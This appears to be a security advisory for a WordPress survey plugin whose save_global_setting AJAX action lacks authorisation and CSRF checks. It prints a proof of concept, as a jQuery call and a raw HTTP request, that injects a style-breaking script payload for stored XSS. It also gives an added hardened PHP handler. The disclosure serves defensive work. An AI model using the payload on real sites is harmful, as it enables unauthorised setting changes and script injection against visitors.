The plugin has neither proper authorisation nor CSRF checks in the save_global_setting AJAX action, allowing unauthenticated users to edit surveys and modify settings. Given the lack of sanitisation and escaping in the settings, this could also lead to a Stored Cross-Site Scripting issue, which will be executed in the context of a user viewing any survey.

jQuery.post("https://example.com/wp-admin/admin-ajax.php?action=save_global_setting", {
    ps_global_options: {ps_options_custom_css: "body{background-color:blue !important;}</style><script>alert(/XSS/)</script><style>"}
})

POST /wp-admin/admin-ajax.php?action=save_global_setting HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 160
Connection: close

ps_global_options%5Bps_options_custom_css%5D=body%7Bbackground-color%3Ablue+!important%3B%7D%3C%2Fstyle%3E%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E%3Cstyle%3E

This will cause all posts with a survey to be rendered blue, along with the XSS alert.
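
A hardened handler for this action, covering the three gaps described above (authorisation, CSRF, sanitisation and escaping). This is an added example, not the plugin's own code or its actual fix. The ps_example_* function names, the nonce action and field, the manage_options capability and the ps_example_global_options storage key are assumptions; only save_global_setting, ps_global_options and ps_options_custom_css come from the request shown above.

```php
<?php
// Added example (not the plugin's code). All ps_example_* names, the nonce
// action/field, the capability and the storage option key are assumptions.

// Register only the authenticated hook. With no wp_ajax_nopriv_ hook,
// logged-out requests to admin-ajax.php never reach the handler.
add_action( 'wp_ajax_save_global_setting', 'ps_example_save_global_setting' );

function ps_example_save_global_setting() {
    // CSRF: require a valid nonce for this action. With the third argument
    // set to false the function returns false instead of dying.
    if ( ! check_ajax_referer( 'ps_example_save_global_setting', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
    }

    // Authorisation: only users allowed to manage site options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    $raw = ( isset( $_POST['ps_global_options'] ) && is_array( $_POST['ps_global_options'] ) )
        ? wp_unslash( $_POST['ps_global_options'] )
        : array();

    // Allow-list the keys that are stored; ignore anything else in the array.
    $clean = array();
    if ( isset( $raw['ps_options_custom_css'] ) && is_string( $raw['ps_options_custom_css'] ) ) {
        // Sanitise on input: strip all markup so the stored value cannot
        // close the surrounding <style> element and open a <script>.
        $clean['ps_options_custom_css'] = wp_strip_all_tags( $raw['ps_options_custom_css'] );
    }

    update_option( 'ps_example_global_options', $clean );
    wp_send_json_success();
}

// Escape on output as well, so values stored before the fix are neutralised.
add_action( 'wp_head', 'ps_example_print_custom_css' );

function ps_example_print_custom_css() {
    $options = get_option( 'ps_example_global_options', array() );
    if ( ! empty( $options['ps_options_custom_css'] ) ) {
        echo '<style>' . wp_strip_all_tags( $options['ps_options_custom_css'] ) . '</style>';
    }
}
```

The nonce would be created server-side with wp_create_nonce() for the same action name and sent by the settings page in the nonce field of the request.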